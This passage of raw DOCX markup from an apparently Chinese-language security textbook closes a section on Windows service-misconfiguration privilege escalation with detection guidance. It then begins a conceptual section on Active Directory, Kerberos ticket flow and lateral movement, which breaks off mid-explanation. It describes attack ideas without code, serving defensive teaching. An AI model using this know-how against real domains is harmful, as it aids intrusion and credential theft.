        <w:t xml:space="preserve">）或用户具有写入权限的可疑目录，这是明确的入侵指标。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">事件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ID 4688</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（创建了新进程）。重点监控由</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">services.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（PID</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">通常小于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">600）作为父进程，但是子进程的路径不属于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Windows\</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或“受信软件”目录的事件。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">事件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ID 5140</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（对网络共享的访问）。如果一个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SYSTEM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">身份的进程突然访问了攻击者的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SMB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">共享以加载载荷，应触发告警。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">小结</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的提权攻击，特别是围绕服务配置错误的利用，深刻地揭示了“安全是配置的产物”这一思想。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">NT AUTHORITY\SYSTEM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">账户作为本地最高权力化身，必须受到层层</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ACL、最小特权原则以及监控日志的严密保护。无论是开发者在编写服务安装脚本时的一个疏忽（忘记在路径上加引号），还是管理员在调试时错误地放宽了服务权限、误启用了组策略，都可能彻底瓦解操作系统的安全边界，将系统控制权拱手相让。对于渗透测试者（授权红队）而言，这些是必须掌握的基础枚举技能；而对于防御者（蓝队）而言，理解这些攻击原理，是构建有效的配置基线、设置检测规则、并最终实现持久防御的前提。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">延伸阅读</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">微软官方文档</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Service Security and Access Rights</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，系统性地解释了服务对象的权限模型①。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">T1574.010 - Hijack Execution Flow: Services File Permissions Weakness</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，将本节所述技术纳入全球防御知识体系。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">OffSec PEN-200 (PWK)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：其课程模块中对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务提权有大量基于授权实验箱的实战演练，是本节原理学习的自然进阶路径。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Windows Internals (Yosifovich </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">等)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">令牌、进程和安全子系统的剖析是深入理解提权的核心理论著作。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="294"/>
    <w:bookmarkStart w:id="295" w:name="ad-与-kerberos横向移动概念防御习题小结延伸"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">16.2 AD </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Kerberos·横向移动概念·防御·习题·小结·延伸</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">前置依赖框</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">《从位到物联》第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 24–27 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章（以太网/IP/TCP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议栈）：理解网络基本通信，横向移动涉及跨主机通信，但协议细节此处不重讲。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本书</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Ch15（Linux</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提权）：提权的通用思想（违反最小权限、配置错误）在本节延伸至域内权限提升。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本书</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Ch17（Metasploit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">从扫描到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">getshell）：通过漏洞获得初始立足点（shell），是横向移动的前置条件。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节所有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kerberos </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">交互的密码学基底（对称/非对称加密、哈希函数）回指馆藏《从位到物联》CM5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">数论/RSA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">部分，此处直接使用，不再推导数学。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">授权与隔离声明框</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; ⚠️ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节所有概念与实验演示命令（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">klist</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">net session</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等）仅限在读者自建的、与生产网络及公网完全隔离的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Windows AD </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实验环境（例如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Hyper-V/VirtualBox </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内搭建的域控与若干成员主机）或官方授权的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AD </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻防靶场（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TryHackMe、HackTheBox </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AD </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">系列靶机）中运行。未经授权对他人系统使用本节所述技术将触犯法律。实验前务必创建虚拟机快照以便回滚。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在上一节（16.1）中，我们聚焦于单台</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">主机上的提权攻击，剖析了服务配置错误、访问令牌机制等本地提升路径。然而，真实的网络攻击往往不以控制单机为终点。攻击者一旦攻陷域内一台主机，就会以此为跳板，利用域环境中固有的信任关系与集中式身份认证体系，向域控制器、文件服务器等高价值目标渗透。这正是本节的核心主题：Active</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Directory（AD）与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kerberos </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">认证的原理，以及基于这些原理的横向移动概念与防御。本节在“16</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提权与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AD </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">入门”中扮演概念收束与防御教育的角色，严格遵循攻防对称：每项攻击思路后必配防御检测与加固要点，所有操作化技术仅限概念描述（标③），严禁武器化。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1. AD </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Kerberos </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">认证原理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">原理直觉：为什么需要域与票据？</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在小型网络中，每台计算机独立维护本地用户账户（SAM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">数据库），登录验证仅在本机进行。当资源（文件共享、打印机、应用）分布在数十台上千台主机时，管理员需要一种集中式身份认证与授权机制：在域中，身份信息存储在域控制器（Domain</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Controller，DC）上，用户凭一个账号单点登录（Single</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Sign-On，SSO），访问域内任意授权资源。这一需求催生了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kerberos </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">域中的深度集成。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Kerberos </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的核心思想是“不要在网络上传递你的密码，而是用一次性的电子票据”。用户向一个受信任的第三方证明身份后，获得一个可证明“已认证”的票据，然后凭该票据向服务证明自己。这避免了每次访问服务都需输入密码或在网络中传输密码</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的风险。理解这一逻辑的关键是：攻击者若能窃取或伪造票据，即可冒充合法用户，域内信任的假定遂被打破。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">AD </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">基础架构与信任关系（标①原理）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Active Directory </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">域环境的目录服务，其数据库（NTDS.dit）存储域内所有对象（用户、组、计算机、组策略等）的属性与安全信息。域控制器运行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AD </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">DS（Active</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Directory Domain </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Services）角色，提供身份认证与授权服务。多台</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">之间通过复制维持数据一致性。域是基于信任的：同一域内计算机默认彼此信任，父域与子域之间可建立双向可传递的信任关系，这使得身份可在整个林（Forest）中流动。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">从攻击者视角看，一旦控制域中一台主机，就能利用域内的隐式信任向高价值目标（DC、文件服务器、数据库）移动；域管理员凭据则意味着整个域的沦陷。防御者因此必须将域视为分层、分信任等级的体系，而非扁平化网络。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Kerberos </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">认证票据流程（标①原理，简化说明）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Kerberos </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">认证涉及三方：客户端（用户）、密钥分发中心（Key</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Distribution </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Center，KDC，Windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中由</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">承载）和目标服务（如文件服务器）。KDC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">又分为认证服务（Authentication</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Service，AS）和票据授予服务（Ticket</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Granting </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Service，TGS）。全套交互分为三个阶段，每个阶段均使用从用户密码派生的长期密钥或会话密钥对称加密，核心步骤如下（图示见</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Mermaid </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">序列图，但此处文字描述）：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">AS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">交换（获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">TGT）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：用户输入密码，客户端计算密码的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">hash，用以向</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> KDC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">发送</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
